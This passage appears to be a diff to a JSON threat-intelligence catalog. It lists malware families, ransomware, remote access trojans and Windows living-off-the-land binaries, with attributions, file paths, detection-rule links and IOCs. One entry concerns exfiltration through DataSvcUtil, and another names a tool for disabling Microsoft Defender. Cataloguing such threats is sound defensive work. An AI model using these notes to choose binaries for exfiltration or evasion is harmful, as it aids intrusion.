[proc_creation_win_csi_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml)\n* Sigma: [proc_creation_win_csi_use_of_csharp_console.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)[[csi.exe - LOLBAS Project](/references/b810ee91-de4e-4c7b-8fa8-24dca95133e5)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5211", + "source": "Tidal Cyber", + "tags": [ + "86bb7f3c-652c-4f77-af2a-34677ff42315", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "bebeee27-af58-4daa-ae34-c432ba0aaf0d", + "type": "similar" + } + ], + "uuid": "a11e4ebf-59e4-4b79-8a20-be1618dfbaed", + "value": "csi" + }, + { + "description": "[CSPY Downloader](https://app.tidalcyber.com/software/eb481db6-d7ba-4873-a171-76a228c9eb97) is a tool designed to evade analysis and download additional payloads used by [Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1).[[Cybereason Kimsuky November 2020](https://app.tidalcyber.com/references/ecc2f5ad-b2a8-470b-b919-cb184d12d00f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0527", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "5256c0f8-9108-4c92-8b09-482dfacdcd94", + "type": "similar" + } + ], + "uuid": "eb481db6-d7ba-4873-a171-76a228c9eb97", + "value": "CSPY Downloader" + }, + { + "description": "\n[Cuba](https://app.tidalcyber.com/software/095064c6-144e-4935-b878-f82151bc08e4) is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.[[McAfee Cuba April 2021](https://app.tidalcyber.com/references/e0e86e08-64ec-48dc-91e6-24fde989cd77)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0625", + "source": "MITRE", + "tags": [ + "4bc9ab8f-7f57-4b1a-8857-ffaa7e5cc930", + "17864218-bc4f-4564-8abf-97c988eea9f7", + "b6458e46-650e-4e96-8e68-8a9d70bcf045", + "bac51672-8240-4182-9087-23626023e509", + "c5c8f954-1bc0-45d5-9a4f-4385d0a720a1", + "2743d495-7728-4a75-9e5f-b64854039792", + "d713747c-2d53-487e-9dac-259230f04460", + "fde4c246-7d2d-4d53-938b-44651cf273f1", + "964c2590-4b52-48c6-afff-9a6d72e68908", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6cd07296-14aa-403d-9229-6343d03d4752", + "type": "similar" + } + ], + "uuid": "095064c6-144e-4935-b878-f82151bc08e4", + "value": "Cuba" + }, + { + "description": "[[CustomShellHost.exe - LOLBAS Project](/references/96324ab1-7eb8-42dc-b19a-fa1d9f85e239)]", + "meta": { + "id": "a45110a8-8c68-4aeb-87b9-668376785df5", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "3ff0d4fc-6678-42f0-869b-f48906d98f82", + "type": "similar" + } + ], + "uuid": "642284c2-5216-47f6-994b-98ff2fa839b9", + "value": "CustomShellHost.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** A host process that is used by custom shells when using Windows in Kiosk mode.\n\n**Author:** Wietze Beukema\n\n**Paths:**\n* C:\\Windows\\System32\\CustomShellHost.exe\n\n**Resources:**\n* [https://twitter.com/YoSignals/status/1381353520088113154](https://twitter.com/YoSignals/status/1381353520088113154)\n* [https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher](https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher)\n\n**Detection:**\n* IOC: CustomShellHost.exe is unlikely to run on normal workstations\n* Sigma: [proc_creation_win_lolbin_customshellhost.yml](https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml)[[CustomShellHost.exe - LOLBAS Project](/references/96324ab1-7eb8-42dc-b19a-fa1d9f85e239)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5098", + "source": "Tidal Cyber", + "tags": [ + "536c3d51-9fc4-445e-9723-e11b69f0d6d5", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "642284c2-5216-47f6-994b-98ff2fa839b9", + "type": "similar" + } + ], + "uuid": "3ff0d4fc-6678-42f0-869b-f48906d98f82", + "value": "CustomShellHost" + }, + { + "description": "[Cyclops Blink](https://app.tidalcyber.com/software/68792756-7dbf-41fd-8d48-ac3cc2b52712) is a modular malware that has been used in widespread campaigns by [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus.[[NCSC Cyclops Blink February 2022](https://app.tidalcyber.com/references/91ed6adf-f066-49e4-8ec7-1989bc6615a6)][[NCSC CISA Cyclops Blink Advisory February 2022](https://app.tidalcyber.com/references/bee6cf85-5cb9-4000-b82e-9e15aebfbece)][[Trend Micro Cyclops Blink March 2022](https://app.tidalcyber.com/references/64e9a24f-f386-4774-9874-063e0ebfb8e1)]", + "meta": { + "platforms": [ + "Network" + ], + "software_attack_id": "S0687", + "source": "MITRE", + "tags": [ + "b20e7912-6a8d-46e3-8e13-9a3fc4813852", + "e809d252-12cc-494d-94f5-954c49eb87ce" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "b350b47f-88fe-4921-8538-6d9c59bac84e", + "type": "similar" + } + ], + "uuid": "68792756-7dbf-41fd-8d48-ac3cc2b52712", + "value": "Cyclops Blink" + }, + { + "description": "[Dacls](https://app.tidalcyber.com/software/9d521c18-09f0-47be-bfe5-e1bf26f7b928) is a multi-platform remote access tool used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) since at least December 2019.[[TrendMicro macOS Dacls May 2020](https://app.tidalcyber.com/references/0ef8691d-48ae-4057-82ef-eb086c05e2b9)][[SentinelOne Lazarus macOS July 2020](https://app.tidalcyber.com/references/489c52a2-34cc-47ff-b42b-9d48f83b9e90)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0497", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "3aa169f8-bbf6-44bb-b57d-7f6ada5c2128", + "type": "similar" + } + ], + "uuid": "9d521c18-09f0-47be-bfe5-e1bf26f7b928", + "value": "Dacls" + }, + { + "description": "[DanBot](https://app.tidalcyber.com/software/131c0eb2-9191-4ccd-a2d6-5f36046a8f2f) is a first-stage remote access Trojan written in C# that has been used by [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) since at least 2018.[[SecureWorks August 2019](https://app.tidalcyber.com/references/573edbb6-687b-4bc2-bc4a-764a548633b5)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1014", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "used-by" + }, + { + "dest-uuid": "b8d48deb-450c-44f6-a934-ac8765aa89cb", + "type": "similar" + } + ], + "uuid": "131c0eb2-9191-4ccd-a2d6-5f36046a8f2f", + "value": "DanBot" + }, + { + "description": "[[TrendMicro DarkComet Sept 2014](https://app.tidalcyber.com/references/fb365600-4961-43ed-8292-1c07cbc530ef)]", + "meta": { + "id": "bdc84346-035e-4ca7-8180-777849982524" + }, + "related": [ + { + "dest-uuid": "74f88899-56d0-4de8-97de-539b3590ab90", + "type": "similar" + } + ], + "uuid": "cc96486b-d19d-4819-8265-9203a28ba6c9", + "value": "Krademok" + }, + { + "description": "[[TrendMicro DarkComet Sept 2014](https://app.tidalcyber.com/references/fb365600-4961-43ed-8292-1c07cbc530ef)]", + "meta": { + "id": "fdd52ea2-a313-490e-9492-a4acd2017344" + }, + "related": [ + { + "dest-uuid": "74f88899-56d0-4de8-97de-539b3590ab90", + "type": "similar" + } + ], + "uuid": "afb90bbd-2299-4f3a-a9a8-792f4401e08f", + "value": "DarkKomet" + }, + { + "description": "[[TrendMicro DarkComet Sept 2014](https://app.tidalcyber.com/references/fb365600-4961-43ed-8292-1c07cbc530ef)]", + "meta": { + "id": "bb346f9a-7140-46c4-b6d7-cd3ba3c96c16" + }, + "related": [ + { + "dest-uuid": "74f88899-56d0-4de8-97de-539b3590ab90", + "type": "similar" + } + ], + "uuid": "f319bc98-ef43-47ef-8572-601f0be6fb68", + "value": "Fynloski" + }, + { + "description": "[[TrendMicro DarkComet Sept 2014](https://app.tidalcyber.com/references/fb365600-4961-43ed-8292-1c07cbc530ef)]", + "meta": { + "id": "b4d8fb4a-4130-4eec-aabc-6949f48ca918" + }, + "related": [ + { + "dest-uuid": "74f88899-56d0-4de8-97de-539b3590ab90", + "type": "similar" + } + ], + "uuid": "abbedb20-272b-4278-ab46-8e46e7cd70ed", + "value": "FYNLOS" + }, + { + "description": "[DarkComet](https://app.tidalcyber.com/software/74f88899-56d0-4de8-97de-539b3590ab90) is a Windows remote administration tool and backdoor.[[TrendMicro DarkComet Sept 2014](https://app.tidalcyber.com/references/fb365600-4961-43ed-8292-1c07cbc530ef)][[Malwarebytes DarkComet March 2018](https://app.tidalcyber.com/references/6a765a99-8d9f-4076-8741-6415a5ab918b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0334", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "e47ae2a7-d34d-4528-ba67-c9c07daa91ba", + "type": "used-by" + }, + { + "dest-uuid": "dfbce236-735c-436d-b433-933bd6eae17b", + "type": "used-by" + }, + { + "dest-uuid": "441b91d1-256a-4763-bac6-8f1c76764a25", + "type": "used-by" + }, + { + "dest-uuid": "53ab35c2-d00e-491a-8753-41d35ae7e547", + "type": "similar" + }, + { + "dest-uuid": "cc96486b-d19d-4819-8265-9203a28ba6c9", + "type": "similar" + }, + { + "dest-uuid": "afb90bbd-2299-4f3a-a9a8-792f4401e08f", + "type": "similar" + }, + { + "dest-uuid": "f319bc98-ef43-47ef-8572-601f0be6fb68", + "type": "similar" + }, + { + "dest-uuid": "abbedb20-272b-4278-ab46-8e46e7cd70ed", + "type": "similar" + } + ], + "uuid": "74f88899-56d0-4de8-97de-539b3590ab90", + "value": "DarkComet" + }, + { + "description": "*Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the **Add to Matrix** button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a [60-second tutorial here](https://www.youtube.com/watch?v=4jBo3XLO01E)).*\n\nDarkGate is a commodity downloader. Researchers have often observed DarkGate samples making use of legitimate copies of AutoIt, a freeware BASIC-like scripting language, using it to run AutoIt scripts as part of its execution chain. Reports of DarkGate infections surged following the announcement of the disruption of the QakBot botnet by international authorities in late August 2023.[[Bleeping Computer DarkGate October 14 2023](/references/313e5558-d8f9-4457-9004-810d9fa5340c)] The delivery of DarkGate payloads via instant messaging platforms including Microsoft Teams and Skype was reported in September and October 2023.[[DarkGate Loader delivered via Teams - Truesec](/references/4222a06f-9528-4076-8037-a27012c2930c)][[Trend Micro DarkGate October 12 2023](/references/81650f5b-628b-4e76-80d6-2c15cf70d37a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5266", + "source": "Tidal Cyber", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "28f3dbcc-b248-442f-9ff3-234210bb2f2a", + "type": "used-by" + } + ], + "uuid": "7144b703-f471-4bde-bedc-e8b274854de5", + "value": "DarkGate" + }, + { + "description": "[DarkTortilla](https://app.tidalcyber.com/software/35abcb6b-3259-57c1-94fc-50cfd5bde786) is a highly configurable .NET-based crypter that has been possibly active since at least August 2015. [DarkTortilla](https://app.tidalcyber.com/software/35abcb6b-3259-57c1-94fc-50cfd5bde786) has been used to deliver popular information stealers, RATs, and payloads such as [Agent Tesla](https://app.tidalcyber.com/software/304650b1-a0b5-460c-9210-23a5b53815a4), AsyncRat, [NanoCore](https://app.tidalcyber.com/software/db05dbaa-eb3a-4303-b37e-18d67e7e85a1), RedLine, [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6), and Metasploit.[[Secureworks DarkTortilla Aug 2022](https://app.tidalcyber.com/references/4b48cc22-55ac-5b61-b183-9008f7db37fd)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1066", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5faaf81a-aa5b-4a4b-bae5-522439e068f8", + "type": "similar" + } + ], + "uuid": "35abcb6b-3259-57c1-94fc-50cfd5bde786", + "value": "DarkTortilla" + }, + { + "description": "[DarkWatchman](https://app.tidalcyber.com/software/740a0327-4caf-4d90-8b51-f3f9a4d59b37) is a lightweight JavaScript-based remote access tool (RAT) that avoids file operations; it was first observed in November 2021.[[Prevailion DarkWatchman 2021](https://app.tidalcyber.com/references/449e7b5c-7c62-4a63-a676-80026a597fc9)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0673", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "63686509-069b-4143-99ea-4e59cad6cb2a", + "type": "similar" + } + ], + "uuid": "740a0327-4caf-4d90-8b51-f3f9a4d59b37", + "value": "DarkWatchman" + }, + { + "description": "[[Trend Micro Daserf Nov 2017](https://app.tidalcyber.com/references/4ca0e6a9-8c20-49a0-957a-7108083a8a29)]", + "meta": { + "id": "c3e307a0-015c-425b-86e8-1e10e473dde3" + }, + "related": [ + { + "dest-uuid": "fad65026-57c4-4d4f-8803-87178dd4b887", + "type": "similar" + } + ], + "uuid": "dae98258-e7d1-4e13-9c88-13d5fe07bf89", + "value": "Nioupale" + }, + { + "description": "[[Trend Micro Daserf Nov 2017](https://app.tidalcyber.com/references/4ca0e6a9-8c20-49a0-957a-7108083a8a29)]", + "meta": { + "id": "b4266b69-f6d1-4b1a-b8d1-13fa716d7820" + }, + "related": [ + { + "dest-uuid": "fad65026-57c4-4d4f-8803-87178dd4b887", + "type": "similar" + } + ], + "uuid": "82694e7e-140d-4ee6-93a0-03af069029cf", + "value": "Muirim" + }, + { + "description": "[Daserf](https://app.tidalcyber.com/software/fad65026-57c4-4d4f-8803-87178dd4b887) is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. [[Trend Micro Daserf Nov 2017](https://app.tidalcyber.com/references/4ca0e6a9-8c20-49a0-957a-7108083a8a29)] [[Secureworks BRONZE BUTLER Oct 2017](https://app.tidalcyber.com/references/c62d8d1a-cd1b-4b39-95b6-68f3f063dacf)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0187", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "used-by" + }, + { + "dest-uuid": "b6b3dfc7-9a81-43ff-ac04-698bad48973a", + "type": "similar" + }, + { + "dest-uuid": "dae98258-e7d1-4e13-9c88-13d5fe07bf89", + "type": "similar" + }, + { + "dest-uuid": "82694e7e-140d-4ee6-93a0-03af069029cf", + "type": "similar" + } + ], + "uuid": "fad65026-57c4-4d4f-8803-87178dd4b887", + "value": "Daserf" + }, + { + "description": "[[DataSvcUtil.exe - LOLBAS Project](/references/0c373780-3202-4036-8c83-f3d468155b35)]", + "meta": { + "id": "19ffd64e-a0bb-4dc2-be9d-f592cc81b9b8", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "dd555a4c-3b04-48c1-988f-d530d699a5bf", + "type": "similar" + } + ], + "uuid": "c64f5d2e-d645-4dd8-bc8f-9e515f8f80c3", + "value": "DataSvcUtil.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.\n\n**Author:** Ialle Teixeira\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe\n\n**Resources:**\n* [https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe](https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe)\n* [https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services](https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services)\n* [https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services](https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml)\n* IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory.\n* IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.\n* IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.[[DataSvcUtil.exe - LOLBAS Project](/references/0c373780-3202-4036-8c83-f3d468155b35)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5099", + "source": "Tidal Cyber", + "tags": [ + "0576be43-65c6-4d1a-8a06-ed8232ca0120", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "c64f5d2e-d645-4dd8-bc8f-9e515f8f80c3", + "type": "similar" + } + ], + "uuid": "dd555a4c-3b04-48c1-988f-d530d699a5bf", + "value": "DataSvcUtil" + }, + { + "description": "[DCSrv](https://app.tidalcyber.com/software/26ae3cd1-6710-4807-b674-957bd67d3e76) is destructive malware that has been used by [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) since at least September 2021. Though [DCSrv](https://app.tidalcyber.com/software/26ae3cd1-6710-4807-b674-957bd67d3e76) has ransomware-like capabilities, [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) does not demand ransom or offer a decryption key.[[Checkpoint MosesStaff Nov 2021](https://app.tidalcyber.com/references/d6da2849-cff0-408a-9f09-81a33fc88a56)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1033", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a41725c5-eb3a-4772-8d1e-17c3bbade79c", + "type": "used-by" + }, + { + "dest-uuid": "5633ffd3-81ef-4f98-8f93-4896b03998f0", + "type": "similar" + } + ], + "uuid": "26ae3cd1-6710-4807-b674-957bd67d3e76", + "value": "DCSrv" + }, + { + "description": "[DDKONG](https://app.tidalcyber.com/software/0657b804-a889-400a-97d7-a4989809a623) is a malware sample that was part of a campaign by [Rancor](https://app.tidalcyber.com/groups/021b3c71-6467-4e46-a413-8b726f066f2c). [DDKONG](https://app.tidalcyber.com/software/0657b804-a889-400a-97d7-a4989809a623) was first seen used in February 2017. [[Rancor Unit42 June 2018](https://app.tidalcyber.com/references/45098a85-a61f-491a-a549-f62b02dc2ecd)]", + "meta": { + "platforms": [], + "software_attack_id": "S0255", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "021b3c71-6467-4e46-a413-8b726f066f2c", + "type": "used-by" + }, + { + "dest-uuid": "d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb", + "type": "similar" + } + ], + "uuid": "0657b804-a889-400a-97d7-a4989809a623", + "value": "DDKONG" + }, + { + "description": "[[Mandiant APT41](https://app.tidalcyber.com/references/e54415fe-40c2-55ff-9e75-881bc8a912b8)]", + "meta": { + "id": "27732d5a-fe42-5727-8345-e2e0051ae1d3" + }, + "related": [ + { + "dest-uuid": "e9533664-90c5-5b40-a40e-a69a2eda8bc9", + "type": "similar" + } + ], + "uuid": "a5895370-3911-4fd5-a61d-5e7cdf4eaa7b", + "value": "DEADEYE.EMBED" + }, + { + "description": "[[Mandiant APT41](https://app.tidalcyber.com/references/e54415fe-40c2-55ff-9e75-881bc8a912b8)]", + "meta": { + "id": "549c4c79-c0e1-5768-ac75-0e60d807afe2" + }, + "related": [ + { + "dest-uuid": "e9533664-90c5-5b40-a40e-a69a2eda8bc9", + "type": "similar" + } + ], + "uuid": "f55765f5-c5b6-4b6d-a50d-f96793569149", + "value": "DEADEYE.APPEND" + }, + { + "description": "[DEADEYE](https://app.tidalcyber.com/software/e9533664-90c5-5b40-a40e-a69a2eda8bc9) is a malware launcher that has been used by [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) since at least May 2021. [DEADEYE](https://app.tidalcyber.com/software/e9533664-90c5-5b40-a40e-a69a2eda8bc9) has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).[[Mandiant APT41](https://app.tidalcyber.com/references/e54415fe-40c2-55ff-9e75-881bc8a912b8)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1052", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c46eb8e6-bf29-4696-8008-3ddb0b4ca470", + "type": "similar" + }, + { + "dest-uuid": "a5895370-3911-4fd5-a61d-5e7cdf4eaa7b", + "type": "similar" + }, + { + "dest-uuid": "f55765f5-c5b6-4b6d-a50d-f96793569149", + "type": "similar" + } + ], + "uuid": "e9533664-90c5-5b40-a40e-a69a2eda8bc9", + "value": "DEADEYE" + }, + { + "description": "[DealersChoice](https://app.tidalcyber.com/software/64dc5d44-2304-4875-b517-316ab98512c2) is a Flash exploitation framework used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5). [[Sofacy DealersChoice](https://app.tidalcyber.com/references/ec157d0c-4091-43f5-85f1-a271c4aac1fc)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0243", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "8f460983-1bbb-4e7e-8094-f0b5e720f658", + "type": "similar" + } + ], + "uuid": "64dc5d44-2304-4875-b517-316ab98512c2", + "value": "DealersChoice" + }, + { + "description": "[DEATHRANSOM](https://app.tidalcyber.com/software/832f5ab1-1267-40c9-84ef-f32d6373be4e) is ransomware written in C that has been used since at least 2020, and has potential overlap with [FIVEHANDS](https://app.tidalcyber.com/software/84187393-2fe9-4136-8720-a6893734ee8c) and [HELLOKITTY](https://app.tidalcyber.com/software/813a4ca1-84fe-42dc-89de-5873d028f98d).[[FireEye FiveHands April 2021](https://app.tidalcyber.com/references/832aeb46-b248-43e8-9157-a2f56bcd1806)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0616", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6de9cad1-eed2-4e27-b0b5-39fa29349ea0", + "type": "similar" + } + ], + "uuid": "832f5ab1-1267-40c9-84ef-f32d6373be4e", + "value": "DEATHRANSOM" + }, + { + "description": "[[DefaultPack.EXE - LOLBAS Project](/references/106efc3e-5816-44ae-a384-5e026e68ab89)]", + "meta": { + "id": "b15fb2b8-f182-4e11-95ad-41686c2c0c64", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "ff25ec03-1e8d-427e-b207-1e1ecca542ec", + "type": "similar" + } + ], + "uuid": "95c59305-52c1-4d55-a9cd-8ce48e7a3a30", + "value": "DefaultPack.EXE" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.\n\n**Author:** @checkymander\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft\\DefaultPack\\\n\n**Resources:**\n* [https://twitter.com/checkymander/status/1311509470275604480.](https://twitter.com/checkymander/status/1311509470275604480.)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_defaultpack.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml)\n* IOC: DefaultPack.EXE spawned an unknown process[[DefaultPack.EXE - LOLBAS Project](/references/106efc3e-5816-44ae-a384-5e026e68ab89)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5212", + "source": "Tidal Cyber", + "tags": [ + "4f7be515-680e-4375-81f6-c71c83dd440d", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "95c59305-52c1-4d55-a9cd-8ce48e7a3a30", + "type": "similar" + } + ], + "uuid": "ff25ec03-1e8d-427e-b207-1e1ecca542ec", + "value": "DefaultPack" + }, + { + "description": "Defender Control is a tool purpose-built to disable Microsoft Defender.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5029", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "e8830cf3-53f3-4d15-858c-584589405fad", + "value": "Defender Control" + }, + { + "description": "[Denis](https://app.tidalcyber.com/software/df4002d2-f557-4f95-af7a-9a4582fb7068) is a Windows backdoor and Trojan used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145). 